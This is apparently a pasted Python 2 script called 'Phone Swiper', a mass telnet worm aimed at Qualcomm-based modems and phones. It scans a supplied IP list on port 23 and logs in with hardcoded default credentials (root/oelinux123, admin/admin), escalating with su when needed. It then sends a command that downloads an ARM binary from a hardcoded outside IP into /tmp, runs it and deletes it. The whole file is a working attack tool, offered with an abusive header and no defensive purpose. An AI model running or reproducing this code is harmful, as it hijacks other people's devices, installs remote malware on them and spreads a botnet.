Phone Swiper

1. #!/usr/bin/python
2. # Phone Swiper
3. # You wanted it? Now you got it... fucking idiots !!!
4.  
5. import threading, sys, time, random, socket, re, os
6.  
7. if len(sys.argv) < 2:
8.         print "Usage: python "+sys.argv[0]+" <list>"
9.         sys.exit()
10.  
11. ips = open(sys.argv[1], "r").readlines()
12. usernames = ["root", "admin"]
13. passwords = ["oelinux123", "admin"]
14. cmd = "cd /tmp; rm -rf tftp; wget http://46.166.148.149/lel4 -O tftp; chmod +x tftp; ./tftp; rm -rf tftp" #arm4 binary
15. count = 0
16. def readUntil(tn, string, timeout=15):
17.     buf = ''
18.     start_time = time.time()
19.     while time.time() - start_time < timeout:
20.         buf += tn.recv(1024)
21.         time.sleep(0.01)
22.         if string in buf: return buf
23.     raise Exception('TIMEOUT!')
24.  
25. class hackify(threading.Thread):
26.         def __init__ (self, ip):
27.             threading.Thread.__init__(self)
28.             self.ip = str(ip).rstrip('\n')
29.         def run(self):
30.         try:
31.             tn = socket.socket()
32.             tn.settimeout(8)
33.             tn.connect((self.ip,23))
34.         except Exception:
35.             tn.close()
36.         try:
37.             hoho = ''
38.             hoho += readUntil(tn, ":")
39.             if "mdm9625" in hoho: #non-root
40.                 r00t = 0
41.                 username = usernames[1]
42.                 password = passwords[1]
43.                 tn.send(username + "\n")
44.                 #print "[%s] sending non-root user"%(self.ip)
45.             elif "9615-cdp" in hoho: #root
46.                 r00t = 1
47.                 username = usernames[0]
48.                 password = passwords[0]
49.                 tn.send(username + "\n")
50.                 #print "[%s] sending root user"%(self.ip)
51.         except Exception:
52.             tn.close()
53.         try:
54.             hoho = ''
55.             hoho += readUntil(tn, "Password:")
56.             if "assword" in hoho:
57.                 tn.send(password + "\n")
58.                 #if r00t: print "[%s] sending root password"%(self.ip)
59.                 #if not r00t: print "[%s] sending non-root password"%(self.ip)
60.                 time.sleep(3)
61.         except Exception:
62.             tn.close()
63.         try:
64.             mp = ''
65.             mp += tn.recv(1024)
66.             if "#" in mp or "$" in mp:
67.                 if r00t: tn.send(cmd + "\n"); print "command sent %s!"%(self.ip); time.sleep(10); tn.close()
68.                 if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send(cmd + "\n"); print "command sent %s!"%(self.ip); time.sleep(10); tn.close()
69.         except Exception:
70.             print "[%s] TIMEOUT"%(count)
71.             tn.close()
72.  
73. print "Total IPs: %s\n"%(len(ips))
74. for ip in ips:
75.     try:
76.         count += 1
77.         t = hackify(ip)
78.         t.start()
79.         time.sleep(0.01)
80.     except:
81.         pass